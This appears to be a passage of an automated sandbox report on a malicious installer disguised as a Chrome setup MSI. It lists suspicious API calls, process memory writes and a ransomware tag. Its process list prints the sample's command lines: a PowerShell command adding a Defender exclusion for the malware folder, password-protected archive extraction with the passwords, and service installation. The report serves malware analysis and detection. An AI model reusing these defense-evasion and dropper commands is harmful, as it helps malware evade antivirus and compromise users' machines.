N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A
N/A | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeSyncAgentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeEnableDelegationPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeImpersonatePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\srtasks.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\srtasks.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\srtasks.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\srtasks.exe | N/A
Token: SeBackupPrivilege | N/A | C:\Windows\system32\srtasks.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\srtasks.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Windows\system32\srtasks.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\srtasks.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe | N/A
Token: 35 | N/A | C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe | N/A
Token: 35 | N/A | C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A
Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\msiexec.exe | N/A
N/A | N/A | C:\Windows\system32\msiexec.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Suspicious use of SendNotifyMessage

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A
N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3436 wrote to memory of 756 | N/A | C:\Windows\system32\msiexec.exe | C:\Windows\system32\srtasks.exe
PID 3436 wrote to memory of 756 | N/A | C:\Windows\system32\msiexec.exe | C:\Windows\system32\srtasks.exe
PID 3436 wrote to memory of 4524 | N/A | C:\Windows\system32\msiexec.exe | C:\Windows\System32\MsiExec.exe
PID 3436 wrote to memory of 4524 | N/A | C:\Windows\system32\msiexec.exe | C:\Windows\System32\MsiExec.exe
PID 4524 wrote to memory of 3560 | N/A | C:\Windows\System32\MsiExec.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4524 wrote to memory of 3560 | N/A | C:\Windows\System32\MsiExec.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4524 wrote to memory of 2428 | N/A | C:\Windows\System32\MsiExec.exe | C:\Windows\System32\cmd.exe
PID 4524 wrote to memory of 2428 | N/A | C:\Windows\System32\MsiExec.exe | C:\Windows\System32\cmd.exe
PID 2428 wrote to memory of 1928 | N/A | C:\Windows\System32\cmd.exe | C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 2428 wrote to memory of 1928 | N/A | C:\Windows\System32\cmd.exe | C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 2428 wrote to memory of 1928 | N/A | C:\Windows\System32\cmd.exe | C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 2428 wrote to memory of 1320 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\PING.EXE
PID 2428 wrote to memory of 1320 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\PING.EXE
PID 2428 wrote to memory of 4012 | N/A | C:\Windows\System32\cmd.exe | C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 2428 wrote to memory of 4012 | N/A | C:\Windows\System32\cmd.exe | C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 2428 wrote to memory of 4012 | N/A | C:\Windows\System32\cmd.exe | C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe
PID 4524 wrote to memory of 1904 | N/A | C:\Windows\System32\MsiExec.exe | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 4524 wrote to memory of 1904 | N/A | C:\Windows\System32\MsiExec.exe | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 4524 wrote to memory of 1904 | N/A | C:\Windows\System32\MsiExec.exe | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 4524 wrote to memory of 1312 | N/A | C:\Windows\System32\MsiExec.exe | C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe
PID 4524 wrote to memory of 1312 | N/A | C:\Windows\System32\MsiExec.exe | C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe
PID 4524 wrote to memory of 1312 | N/A | C:\Windows\System32\MsiExec.exe | C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe
PID 1312 wrote to memory of 2208 | N/A | C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe | C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe
PID 1312 wrote to memory of 2208 | N/A | C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe | C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe
PID 1312 wrote to memory of 2208 | N/A | C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe | C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe
PID 2208 wrote to memory of 3176 | N/A | C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe | C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe
PID 2208 wrote to memory of 3176 | N/A | C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe | C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe
PID 2208 wrote to memory of 3176 | N/A | C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe | C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe
PID 3840 wrote to memory of 1964 | N/A | C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe | C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
PID 3840 wrote to memory of 1964 | N/A | C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe | C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
PID 3840 wrote to memory of 1964 | N/A | C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe | C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
PID 3480 wrote to memory of 1628 | N/A | C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe | C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
PID 3480 wrote to memory of 1628 | N/A | C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe | C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
PID 3480 wrote to memory of 1628 | N/A | C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe | C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe
PID 3172 wrote to memory of 608 | N/A | C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 3172 wrote to memory of 608 | N/A | C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 3172 wrote to memory of 608 | N/A | C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 608 wrote to memory of 1700 | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 608 wrote to memory of 1700 | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 608 wrote to memory of 1700 | N/A | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe | C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe
PID 3480 wrote to memory of 3952 | N/A | C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe
PID 3480 wrote to memory of 3952 | N/A | C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe
PID 3952 wrote to memory of 4168 | N/A | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe
PID 3952 wrote to memory of 4168 | N/A | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\130.0.6723.117_chrome_installer.exe | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe
PID 4168 wrote to memory of 1972 | N/A | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe
PID 4168 wrote to memory of 1972 | N/A | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe
PID 4168 wrote to memory of 2368 | N/A | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe
PID 4168 wrote to memory of 2368 | N/A | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe
PID 2368 wrote to memory of 3336 | N/A | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe
PID 2368 wrote to memory of 3336 | N/A | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe | C:\Program Files (x86)\chrome_Unpacker_BeginUnzipping3480_1980429023\CR_991E3.tmp\setup.exe
PID 2208 wrote to memory of 1544 | N/A | C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 2208 wrote to memory of 1544 | N/A | C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 4460 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 4460 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1544 wrote to memory of 2460 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\ChromeSetupz.5516.25.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 66E8F5AE06D39077EDE38968856D3E64 E Global\MSI0000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\DriveHumbleTechnician'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x "C:\Program Files\DriveHumbleTechnician\XSMdjOpzlHEtnonzAHdFfqjsKAHetr" -o"C:\Program Files\DriveHumbleTechnician\" -p"373357|xZmCie].{GTlD" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x "C:\Program Files\DriveHumbleTechnician\eaKqUwGXuXSKSERTyFiFfxKGAgTAir" -x!1_yrjwPObnoqyg.exe -o"C:\Program Files\DriveHumbleTechnician\" -p"91844v.Gsd9S^{PzzOfj" -y

C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe

"C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x "C:\Program Files\DriveHumbleTechnician\XSMdjOpzlHEtnonzAHdFfqjsKAHetr" -o"C:\Program Files\DriveHumbleTechnician\" -p"373357|xZmCie].{GTlD" -y

C:\Windows\system32\PING.EXE

ping 127.0.0.1 -n 2

C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe

"C:\Program Files\DriveHumbleTechnician\qQYSSihgyoxprPyXJXzhAKmSpDJpse.exe" x "C:\Program Files\DriveHumbleTechnician\eaKqUwGXuXSKSERTyFiFfxKGAgTAir" -x!1_yrjwPObnoqyg.exe -o"C:\Program Files\DriveHumbleTechnician\" -p"91844v.Gsd9S^{PzzOfj" -y

C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe

"C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe" -number 121 -file file3 -mode mode3

C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe

"C:\Program Files\DriveHumbleTechnician\C1h2r3a6ais7up.exe"

C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe

"C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe" --install=appguid={8A69D345-D564-463C-AFF1-A69D9E530F96}&iid={FD39FE3E-F972-AC55-37EA-CE3FED473068}&lang=zh-CN&browser=4&usagestats=1&appname=Google%20Chrome&needsadmin=prefers&ap=x64-statsdef_1&installdataindex=empty --enable-logging --vmodule=*/components/winhttp/*=1,*/components/update_client/*=2,*/chrome/updater/*=2

C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe

"C:\Program Files (x86)\Google1312_2134763654\bin\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0x52c694,0x52c6a0,0x52c6ac

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe

"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --system --windows-service --service=update-internal

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe

"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0x81c694,0x81c6a0,0x81c6ac

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.vbs"

C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe

"C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe" install

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe

"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --system --windows-service --service=update

C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe

"C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe" --crash-handler --system "--database=C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad" --url=https://clients2.google.com/cr/report --annotation=prod=Update4 --annotation=ver=128.0.6597.0 "--attachment=C:\Program Files (x86)\Google\GoogleUpdater\updater.log" --initial-client-data=0x278,0x27c,0x280,0x254,0x284,0x81c694,0x81c6a0,0x81c6ac

C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe

"C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe" start

C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe

"C:\Program Files\DriveHumbleTechnician\PpMCUaskmPAB.exe"

C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe

"C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe" -number 166 -file file3 -mode mode3

C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe

"C:\Program Files\DriveHumbleTechnician\yrjwPObnoqyg.exe" -number 62 -file file3 -mode mode3
